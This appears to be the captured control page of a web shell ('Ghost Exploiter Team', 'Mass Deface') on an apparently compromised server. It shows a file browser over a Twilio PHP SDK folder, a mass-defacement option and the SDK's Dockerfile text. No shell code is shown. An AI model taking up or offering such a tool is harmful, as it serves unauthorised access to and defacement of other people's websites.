webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
.github
--
ren
src
--
ren
CODE_OF_CONDUCT.md
3.175KB
edt
ren
Dockerfile
0.273KB
edt
ren
Dockerfile-dev
0.367KB
edt
ren
PULL_REQUEST_TEMPLATE.md
1.608KB
edt
ren
composer.json
0.828KB
edt
ren
phpdox.xml
0.4KB
edt
ren
sonar-project.properties
0.339KB
edt
ren
ARG version FROM php:$version RUN curl --silent --show-error https://getcomposer.org/installer | php RUN mv composer.phar /usr/local/bin/composer RUN apt-get update -y && \ apt-get upgrade -y && \ apt-get dist-upgrade -y && \ apt-get -y autoremove && \ apt-get clean RUN apt-get install -y zip unzip git ENV COMPOSER_ALLOW_SUPERUSER=1 WORKDIR /twilio